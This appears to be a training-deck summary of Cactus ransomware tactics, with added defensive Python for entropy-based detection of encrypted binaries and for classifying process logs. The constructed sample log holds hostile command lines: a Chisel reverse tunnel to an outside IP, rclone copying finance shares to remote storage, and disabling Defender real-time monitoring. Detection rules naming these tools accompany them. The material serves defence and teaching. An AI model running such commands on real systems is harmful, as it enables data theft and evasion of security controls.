The document describes Cactus ransomware, noting that it sets itself apart through distinctive encryption methods that make it difficult to detect. It exploits VPN vulnerabilities to infiltrate networks rather than relying on phishing emails, and has the ability to self-encrypt to remain undetected on compromised systems. The document outlines the attack tactics, techniques, and procedures used by Cactus ransomware, including gaining initial access through VPN weaknesses, installing ransomware, mapping the network, deploying tools to facilitate lateral movement, installing remote monitoring software, exfiltrating data, disabling antivirus, and distributing ransomware across all systems.
2. WHAT IS CACTUS RANSOMWARE
Cactus ransomware sets itself apart through its distinctive use of encryption, which makes it harder for security tools to detect. It gains entry by exploiting vulnerabilities in VPN appliances rather than by relying on phishing emails, and it has the uncommon ability to self-encrypt: the ransomware binary itself is stored in encrypted form and is only decrypted when it runs, which improves its chances of remaining undetected on compromised systems.
www.infosectrain.com @infosectrain #learntorise
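The deck does not say how the self-encryption works, only that it helps the binary stay undetected. The on-disk symptom a defender can check for is that an encrypted (or packed) executable body has near-random byte statistics. The following is an added example, not code from the InfosecTrain deck or from any Cactus sample: a windowed Shannon-entropy check over a file's bytes. The two inputs are constructed here (a low-entropy text stub followed by seeded pseudo-random bytes standing in for ciphertext); the 7.2 bits/byte threshold and the 4096-byte window are assumptions of this example, tuned for illustration rather than taken from any published detection rule.

```python
"""Added example: flag executables whose body looks encrypted or packed.

Shannon entropy is measured per fixed-size window so that a small plaintext
stub (headers, a loader) does not hide a large encrypted body. Plain text and
ordinary x86 code usually sit well below 7 bits/byte; compressed or encrypted
data sits close to 8. The threshold below is a heuristic, not a rule from the
deck or from any vendor.
"""
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte, in the range 0.0 .. 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def windowed_entropy(data: bytes, window: int = 4096) -> list:
    """Entropy of each consecutive `window`-byte slice (last slice may be short)."""
    return [shannon_entropy(data[i:i + window]) for i in range(0, len(data), window)]


def first_high_entropy_offset(data: bytes, threshold: float = 7.2, window: int = 4096):
    """Offset of the first window at or above `threshold`, or None if none is."""
    for idx, ent in enumerate(windowed_entropy(data, window)):
        if ent >= threshold:
            return idx * window
    return None


def looks_encrypted(data: bytes, threshold: float = 7.2, window: int = 4096) -> bool:
    """True if any window of the file has ciphertext-like entropy."""
    return first_high_entropy_offset(data, threshold, window) is not None


# Constructed sample 1: a plaintext stub (PE-style magic plus repeated DOS text),
# 4104 bytes of low-entropy data. Not a real executable.
PLAIN_STUB = b"MZ\x90\x00" + b"This program cannot be run in DOS mode.\r\n" * 100

# Constructed sample 2: the same stub followed by 8192 seeded pseudo-random bytes
# standing in for an encrypted payload. Seeded so the example is reproducible.
_rng = random.Random(2024)
ENCRYPTED_BODY = bytes(_rng.getrandbits(8) for _ in range(8192))
SAMPLE_SELF_ENCRYPTING = PLAIN_STUB + ENCRYPTED_BODY


if __name__ == "__main__":
    for name, blob in (("plain stub", PLAIN_STUB),
                       ("stub + encrypted body", SAMPLE_SELF_ENCRYPTING)):
        ents = ", ".join(f"{e:.2f}" for e in windowed_entropy(blob))
        print(f"{name}: windows=[{ents}] encrypted={looks_encrypted(blob)} "
              f"first_offset={first_high_entropy_offset(blob)}")
```

High entropy alone is not proof of malice: legitimately compressed resources, installers and signed packers trip the same check, so the result is a triage signal to combine with provenance (signer, download source, execution parent), not a verdict on its own.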
3. CACTUS RANSOMWARE: Attack Tactics, Techniques & Procedures
STEP 1: Connect via VPN
The attacker gets into the victim's network through a weakness in a VPN appliance, taking advantage of known vulnerabilities in appliances that have not been patched or updated.
4. STEP 2: Install the ransomware
The attacker installs the Cactus ransomware on the victim's system. The deck lists phishing emails, malicious attachments and drive-by downloads as possible delivery methods; note that these are generic ransomware delivery channels and sit uneasily with the earlier slide, which states that Cactus intrusions rely on VPN exploitation rather than phishing. The entry point the deck itself describes is the VPN access gained in Step 1.
STEP 3: Map the network
The attacker conducts an internal network scan using tools such as SoftPerfect Network Scanner or PSnmap to build a map of the environment.
5. STEP 4: Deploy lateral-movement tooling
To facilitate lateral movement, the attacker deploys the Cobalt Strike post-exploitation framework and the Chisel tunnelling and proxying tool.
STEP 5: Install remote access tooling
The attacker installs Remote Monitoring and Management (RMM) tools on compromised systems, giving them persistent remote access and the ability to push files to those hosts.
6. STEP 6: Exfiltrate data
The attacker uses the Rclone tool to steal data from the environment, automating the transfer of files out to external storage.
STEP 7: Disable anti-virus
The attacker runs a script that disables widely used anti-virus tools, reducing the chance that their tooling is detected and blocked before the ransomware is deployed.
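Steps 3 to 7 above each leave a process-creation artefact on the host: a scanner, Chisel, an RMM installer, Rclone and an anti-virus kill script. The following is an added example, not code from the InfosecTrain deck, showing how a detection engineer would map those artefacts back to the deck's steps and, more usefully, flag hosts where several steps chain together. The log lines are constructed for this example in a minimal pipe-delimited layout (time|host|user|image|command line) loosely modelled on a Sysmon process-creation export; the host names, user names, paths, remote IP and the choice of AnyDesk as the RMM tool are all assumptions of the example and not taken from any real intrusion. The deck names no specific RMM product.

```python
"""Added example: classify process-creation events against the deck's steps.

Input is constructed sample data in the format  time|host|user|image|cmdline.
The rules are keyed on file names and command-line verbs that the deck's tools
expose; Cobalt Strike itself is usually found via memory or network indicators,
so only obvious file-name artefacts are covered here.
"""
import re
from collections import defaultdict

# Constructed sample log (not from any real incident). Backslashes are doubled
# because this is a normal Python string.
SAMPLE_LOG = """\
2024-01-10T02:11:03Z|WS01|corp\\jsmith|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs
2024-01-10T02:14:21Z|WS01|corp\\jsmith|C:\\Users\\jsmith\\AppData\\Local\\Temp\\netscan.exe|netscan.exe /range:10.0.0.1-10.0.255.254 /auto:result.xml
2024-01-10T02:20:45Z|WS01|corp\\jsmith|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -ExecutionPolicy Bypass -File psnmap.ps1 -ComputerName 10.0.1.0/24
2024-01-10T02:31:09Z|WS01|corp\\jsmith|C:\\ProgramData\\chisel.exe|chisel.exe client 203.0.113.10:8080 R:socks
2024-01-10T02:40:00Z|FS02|corp\\svc_backup|C:\\ProgramData\\AnyDesk\\AnyDesk.exe|AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent
2024-01-10T03:05:12Z|FS02|corp\\svc_backup|C:\\ProgramData\\rclone\\rclone.exe|rclone.exe copy D:\\Shares\\Finance remote:bucket --transfers 32 --no-check-certificate
2024-01-10T03:15:40Z|FS02|corp\\svc_backup|C:\\Windows\\System32\\cmd.exe|cmd.exe /c disable_av.bat
2024-01-10T03:15:41Z|FS02|corp\\svc_backup|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
2024-01-10T03:30:00Z|FS02|corp\\svc_backup|C:\\Windows\\explorer.exe|explorer.exe
"""

# (deck step, regex applied to "image|cmdline"). Case-insensitive.
# The RMM list is an illustrative selection of common remote-access products.
RULES = [
    ("STEP 3 internal network scan",
     re.compile(r"netscan\.exe|softperfect|psnmap", re.I)),
    ("STEP 4 lateral movement tooling (Cobalt Strike / Chisel)",
     re.compile(r"\bchisel(\.exe)?\b\s+(client|server)|cobaltstrike|beacon\.(exe|dll)", re.I)),
    ("STEP 5 RMM tool installed",
     re.compile(r"anydesk|splashtop|teamviewer|screenconnect", re.I)),
    ("STEP 6 exfiltration with Rclone",
     re.compile(r"\brclone(\.exe)?\b\s+(copy|sync|move)", re.I)),
    ("STEP 7 anti-virus disabled",
     re.compile(r"Set-MpPreference\s+-Disable|disable_av|DisableRealtimeMonitoring", re.I)),
]


def parse_event(line: str):
    """Split one pipe-delimited record into a dict, or None if malformed."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    time, host, user, image, cmdline = parts
    return {"time": time, "host": host, "user": user, "image": image, "cmdline": cmdline}


def classify(event: dict) -> list:
    """Return every deck step whose rule matches the event's image or command line."""
    haystack = f"{event['image']}|{event['cmdline']}"
    return [label for label, rx in RULES if rx.search(haystack)]


def detect(log_text: str):
    """Return (hits, per_host): individual matches and the set of steps seen per host."""
    hits = []
    per_host = defaultdict(set)
    for line in log_text.splitlines():
        event = parse_event(line)
        if event is None:
            continue
        for label in classify(event):
            hits.append((event["time"], event["host"], label))
            per_host[event["host"]].add(label)
    return hits, dict(per_host)


def kill_chain_hosts(per_host: dict, min_steps: int = 2) -> list:
    """Hosts on which at least `min_steps` distinct deck steps were observed.

    A scanner or Rclone alone may be an administrator at work; two or more of
    the deck's steps on one host within an intrusion window is a far stronger
    signal and is what an analyst should page on.
    """
    return sorted(host for host, steps in per_host.items() if len(steps) >= min_steps)


if __name__ == "__main__":
    found, by_host = detect(SAMPLE_LOG)
    for time, host, label in found:
        print(f"{time} {host}: {label}")
    print("hosts with a chained sequence:", kill_chain_hosts(by_host))
```

On the constructed sample this yields seven hits across the two hosts and reports both as chained, because WS01 shows scanning followed by Chisel and FS02 shows an RMM install, Rclone and an anti-virus kill. The same logic transfers to real telemetry by swapping `parse_event` for a Sysmon or EDR parser and keeping the rule table.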
8. TIPS TO PROTECT YOURSELF FROM CACTUS RANSOMWARE
01 Keep VPN appliances up to date with the latest security patches.
02 Use network monitoring tools to detect suspicious activity.
03 Educate yourself about ransomware attacks.
04 Implement strong password policies and enforce multi-factor authentication.